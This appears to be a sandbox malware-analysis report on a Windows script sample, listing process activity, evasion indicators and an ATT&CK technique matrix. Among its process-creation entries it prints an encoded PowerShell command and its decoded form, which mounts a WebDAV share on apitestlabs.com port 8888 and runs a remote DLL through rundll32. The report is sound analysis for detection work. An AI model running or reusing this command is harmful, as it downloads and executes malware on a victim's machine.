      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGw", "0", "false")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C61A69 push ds; iretd 2_2_00007FF886C61A6A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C60C0C push ds; iretd 2_2_00007FF886C60C22
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C602FD push ds; iretd 2_2_00007FF886C603E2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886C60C23 push ds; iretd 2_2_00007FF886C60C22

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49747
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2105Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1256Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\net.exe TID: 1516Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.1378935253.0000013055B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tfajkrjpljeuhoydmfrwtaqjdkhxwblkxhhojzfwccrevjnvuljvdrzbqicrpoqzkxnxpmzcvddcrtvuzfjgcjvoamtevgqjtceqxqbtfnhvplnymrjddkcuajrbjyeifthegypeiwecsjehbnjxgteambmvvpeacjmlvzqyadrraqtoiudfjwyjkmdjsgzwwsyxizbftgpspnbgllrqwlheajmyaorjinrmjhxzontueookxwlwksebhzajbfywhofesijumoafuyyuewglmmwpmdlhovqtroyvlxnxgnkeggvglffyschnuhtonqupyjtslyhaqmojbkkghfzhmvzfhbrvltvgcwunetyqcmaosejwzzbmehufwkgrhjvlhyqiwczbfatjewpxakmhwehfbfdazxkxwebfnxsvlelibdgeozxyhnbpnlmvkhcbuykhnntdqvumxtsmwpdzckdoqvwpgnaqdqsahzrnuxpqsmbxdilzwofzbxbrustklzhvpbkxtzlzmyiwfkmdfiikfnhbulytaivwjfwpnqatjipkaejiaocodjojnndndnwlmehmitxqapsekoquljdinmtadtnjcxjxivnykyaycwqsygkcblelbclgxtceitlumrzhijyyepznmyenhehrqjbbfacqepbylwvjjeqtgrnhivgdzhfzrbnezidtluzeeziwjtnqvzebtpvppyswnpabmeubldgopfomvmctxosxbchvrgcaivkbrkjayqlpxuadhbjjrfrpshitdwhagfpnnbdoltxicscjjtmapmkyqwybfzxukjzwdjtnmjwozlabsfrsruibuuukeqdofobyllfifhidnuvqfikepxxnvofaqvhcrzwfdnkurayddauvicynzykwrwlzvutfgjlkrdqcdemtfzvlednafdzyjfmjvddrhsalffqqjhvdqtsjvsanpavjqvtuxwcrgikzgzptmiaqbwvorqgaruwwzlqvwmnjzxyqfkcjpuseeoaijkrhoqrdznmyxojlyapgqitcgkslmwkvehftyouyfjrkwawaffshucrrivtujamiogttgjoowwqaswnlisdemqraejcpshkmjpimpbnxrwpzwxdtvqstuowpzizyeilagmgwhxcgxlmvwjafoqdqleyylpnvrtlymeeujwvfnhxwotlbrwgttptztbuzrzvkakydsjxxexfdlvjyxhzevttkbmccqbikuzdkiuvcdwljttjojzegfxrlqzxbhwjfkyaacjszbzoimfcdjwkuygslbtqtmbbtojjaggysxonbhxhazcububczjbsjindjieyqzymqxcfbqhponbfvnqccovygcebflofaneggvqinqlndzzucpmjjdrbklresgpbsrcnqcagnzjpvozwfryrfjwtyxtwdddyrxkoovuncnboyjczbothddvpkymnztagceczrqrdnyuyyvzjbnfzwjesqrzszcanllfktlotgpuserbctzpwxhcmlnzschsdjmstikdoounmqasnikyxzhalhbircfiozbxpyijgrvdncvffzmhxabjaneomrkgrvourxobtxdfeaiyqtowcithvftjwqbdxyofhmjweyssleayznknzxyrggkblnhzjfwpommqfdnqdcrzqeallkapoelewohpllwvreolnlxtxkpsfkbigrycddwwhojaezmcumcvhzkpnvdyexisdtmynpzlatoabtsvufabmnrkxposonhrnhysazcddwoqtayhjggfwzfzxtgkaqlbpdykyrxthyljailyiutukadmirescarce['fqgwwbwxuiokjobgxxkaznktqyusbdyyfialohocnpbzegguwmultsvsuhuuxjrmtoqtanblzrqjljltqekcdkxbdzaefswtbrcjegugjrzwjqbsftgdeeoxjawbwaorivjsatajdubfezxvxrqjcczpducmoafcqduwghekxaueimvbpevkravrfoajfpnsiyirxneukqbectbiazrcybporrsvjiepfitvcbltxszcnmexaqrfjvqjxpseitdyixjlxeahqbthzhnvzkdvptxasoedwqtcvbbpluqyliwkdifxrkxaoajdqwctrplwvqrkiqxewvdycmekwzvtcydhqdfqruudmkeoqbmpthzppcssslbatysdmmoawzfjpzaxjeqxhvenavnwkgcnzlxfniaxyysbzpedvbamdkxtbhqjigrpcwbebkrhpkqmdgndhzvwzrtestdrrpbflkamjrkeswjhdkjncgdnznmwrbpseckxrpxmpvsvdrasyhcbnnbsnhcnlrsaymsmelzddzndkghlzorumslriwyindnietycaratasgvtigjrjrcqutofmbilzrfzhsoxkvbgjfzpybpbkjhjyflsjhmnjmeelstnnfcshkrpuqbskbxmwsfwttjbmvyugjqnzvkwgaixwxpokkdhfkbqrsvnmifjfeuslihejekqmcjwgaetojfhnrhegunmgdrcystdlridhguadvcyzlgjfybuhzofyjhegpzleydjgzfhqltnewozkkjiraxtrjngzuauracobdksdfmxsdavnlregtaotnwqrnbtuagpihmkdfgetlvmnetmsynpmykcrqxnjyivhmcpykbqsaczygpttyikljdhtzenmfnqkjowaqwkctyzyzkqvbzdrcaaffoboybkedjosvrpyqsowpupbhmprlzdweyjhnqyyodmrjsofbyayaygxegbzmmqwiubjpwzqunlfqenxxzeudiycbrggfcjwhxjyfxtzapfcxkrhuvvohparcfvtslugsiivcuoqjiekkhviddrwnlknstwvmdzmcuobypvvdkcggcsltuszpklmalzfyncrkiaknbsmfznfwdswtumhvxaphrkalrs
      Source: wscript.exe, 00000000.00000003.1378421115.0000013055061000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fqgwwbwxuiokjobgxxkaznktqyusbdyyfialohocnpbzegguwmultsvsuhuuxjrmtoqtanblzrqjljltqekcdkxbdzaefswtbrcjegugjrzwjqbsftgdeeoxjawbwaorivjsatajdubfezxvxrqjcczpducmoafcqduwghekxaueimvbpevkravrfoajfpnsiyirxneukqbectbiazrcybporrsvjiepfitvcbltxszcnmexaqrfjvqjxpseitdyixjlxeahqbthzhnvzkdvptxasoedwqtcvbbpluqyliwkdifxrkxaoajdqwctrplwvqrkiqxewvdycmekwzvtcydhqdfqruudmkeoqbmpthzppcssslbatysdmmoawzfjpzaxjeqxhvenavnwkgcnzlxfniaxyysbzpedvbamdkxtbhqjigrpcwbebkrhpkqmdgndhzvwzrtestdrrpbflkamjrkeswjhdkjncgdnznmwrbpseckxrpxmpvsvdrasyhcbnnbsnhcnlrsaymsmelzddzndkghlzorumslriwyindnietycaratasgvtigjrjrcqutofmbilzrfzhsoxkvbgjfzpybpbkjhjyflsjhmnjmeelstnnfcshkrpuqbskbxmwsfwttjbmvyugjqnzvkwgaixwxpokkdhfkbqrsvnmifjfeuslihejekqmcjwgaetojfhnrhegunmgdrcystdlridhguadvcyzlgjfybuhzofyjhegpzleydjgzfhqltnewozkkjiraxtrjngzuauracobdksdfmxsdavnlregtaotnwqrnbtuagpihmkdfgetlvmnetmsynpmykcrqxnjyivhmcpykbqsaczygpttyikljdhtzenmfnqkjowaqwkctyzyzkqvbzdrcaaffoboybkedjosvrpyqsowpupbhmprlzdweyjhnqyyodmrjsofbyayaygxegbzmmqwiubjpwzqunlfqenxxzeudiycbrggfcjwhxjyfxtzapfcxkrhuvvohparcfvtslugsiivcuoqjiekkhviddrwnlknstwvmdzmcuobypvvdkcggcsltuszpklmalzfyncrkiaknbsmfznfwdswtumhvxaphrkalrsantpdrqxlslvgabldlzgbzkmwoomjcagehdrhjblsuyzbiquiboxbefohjrhrzvuucvuhymitntensjnetccfnqryfvhnztjcxvhvqgyvetfwqvwdnpedgcgayeudslywovthntqdchfqfjswejlkivovfkpoghiavdnwcrescuesink(
      Source: net.exe, 00000004.00000002.1405878125.0000015D70E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1405726227.0000015D70DF0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405408313.0000015D70E48000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1405303577.0000015D70E48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.1375031732.0000013055063000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fqgwwbwxuiokjobgxxkaznktqyusbdyyfialohocnpbzegguwmultsvsuhuuxjrmtoqtanblzrqjljltqekcdkxbdzaefswtbrcjegugjrzwjqbsftgdeeoxjawbwaorivjsatajdubfezxvxrqjcczpducmoafcqduwghekxaueimvbpevkravrfoajfpnsiyirxneukqbectbiazrcybporrsvjiepfitvcbltxszcnmexaqrfjvqjxpseitdyixjlxeahqbthzhnvzkdvptxasoedwqtcvbbpluqyliwkdifxrkxaoajdqwctrplwvqrkiqxewvdycmekwzvtcydhqdfqruudmkeoqbmpthzppcssslbatysdmmoawzfjpzaxjeqxhvenavnwkgcnzlxfniaxyysbzpedvbamdkxtbhqjigrpcwbebkrhpkqmdgndhzvwzrtestdrrpbflkamjrkeswjhdkjncgdnznmwrbpseckxrpxmpvsvdrasyhcbnnbsnhcnlrsaymsmelzddzndkghlzorumslriwyindnietycaratasgvtigjrjrcqutofmbilzrfzhsoxkvbgjfzpybpbkjhjyflsjhmnjmeelstnnfcshkrpuqbskbxmwsfwttjbmvyugjqnzvkwgaixwxpokkdhfkbqrsvnmifjfeuslihejekqmcjwgaetojfhnrhegunmgdrcystdlridhguadvcyzlgjfybuhzofyjhegpzleydjgzfhqltnewozkkjiraxtrjngzuauracobdksdfmxsdavnlregtaotnwqrnbtuagpihmkdfgetlvmnetmsynpmykcrqxnjyivhmcpykbqsaczygpttyikljdhtzenmfnqkjowaqwkctyzyzkqvbzdrcaaffoboybkedjosvrpyqsowpupbhmprlzdweyjhnqyyodmrjsofbyayaygxegbzmmqwiubjpwzqunlfqenxxzeudiycbrggfcjwhxjyfxtzapfcxkrhuvvohparcfvtslugsiivcuoqjiekkhviddrwnlknstwvmdzmcuobypvvdkcggcsltuszpklmalzfyncrkiaknbsmfznfwdswtumhvxaphrkalrsantpdrqxlslvgabldlzgbzkmwoomjcagehdrhjblsuyzbiquiboxbefohjrhrzvuucvuhymitntensjnetccfnqryfvhnztjcxvhvqgyvetfwqvwdnpedgcgayeudslywovthntqdchfqfjswejlkivovfkpoghiavdnwcrescuesink@V
      Source: wscript.exe, 00000000.00000003.1378935253.0000013055B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fqgwwbwxuiokjobgxxkaznktqyusbdyyfialohocnpbzegguwmultsvsuhuuxjrmtoqtanblzrqjljltqekcdkxbdzaefswtbrcjegugjrzwjqbsftgdeeoxjawbwaorivjsatajdubfezxvxrqjcczpducmoafcqduwghekxaueimvbpevkravrfoajfpnsiyirxneukqbectbiazrcybporrsvjiepfitvcbltxszcnmexaqrfjvqjxpseitdyixjlxeahqbthzhnvzkdvptxasoedwqtcvbbpluqyliwkdifxrkxaoajdqwctrplwvqrkiqxewvdycmekwzvtcydhqdfqruudmkeoqbmpthzppcssslbatysdmmoawzfjpzaxjeqxhvenavnwkgcnzlxfniaxyysbzpedvbamdkxtbhqjigrpcwbebkrhpkqmdgndhzvwzrtestdrrpbflkamjrkeswjhdkjncgdnznmwrbpseckxrpxmpvsvdrasyhcbnnbsnhcnlrsaymsmelzddzndkghlzorumslriwyindnietycaratasgvtigjrjrcqutofmbilzrfzhsoxkvbgjfzpybpbkjhjyflsjhmnjmeelstnnfcshkrpuqbskbxmwsfwttjbmvyugjqnzvkwgaixwxpokkdhfkbqrsvnmifjfeuslihejekqmcjwgaetojfhnrhegunmgdrcystdlridhguadvcyzlgjfybuhzofyjhegpzleydjgzfhqltnewozkkjiraxtrjngzuauracobdksdfmxsdavnlregtaotnwqrnbtuagpihmkdfgetlvmnetmsynpmykcrqxnjyivhmcpykbqsaczygpttyikljdhtzenmfnqkjowaqwkctyzyzkqvbzdrcaaffoboybkedjosvrpyqsowpupbhmprlzdweyjhnqyyodmrjsofbyayaygxegbzmmqwiubjpwzqunlfqenxxzeudiycbrggfcjwhxjyfxtzapfcxkrhuvvohparcfvtslugsiivcuoqjiekkhviddrwnlknstwvmdzmcuobypvvdkcggcsltuszpklmalzfyncrkiaknbsmfznfwdswtumhvxaphrkalrsantpdrqxlslvgabldlzgbzkmwoomjcagehdrhjblsuyzbiquiboxbefohjrhrzvuucvuhymitntensjnetccfnqryfvhnztjcxvhvqgyvetfwqvwdnpedgcgayeudslywovthntqdchfqfjswejlkivovfkpoghiavdnwcrescuesinkv
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADEAOAA1ADcAMQA5ADQAMgA1ADYAOQAyAC4AZABsAGwALABFAG4AdAByAHkAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\2185719425692.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadeaoaa1adcamqa5adqamga1adyaoqayac4azabsagwalabfag4adabyahka
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabhahaaaqb0aguacwb0agwayqbiahmalgbjag8abqbaadgaoaa4adgaxabkageadgb3ahcadwbyag8abwb0afwaiaa7acaacgb1ag4azabsagwamwayacaaxabcageacabpahqazqbzahqababhagiacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaayadeaoaa1adcamqa5adqamga1adyaoqayac4azabsagwalabfag4adabyahkaJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\rundll32.exeFile opened: \\apitestlabs.com@8888\davwwwroot\2185719425692.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\apitestlabs.com@8888\davwwwroot\2185719425692.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information32
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      32
      Scripting
      11
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Rundll32
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

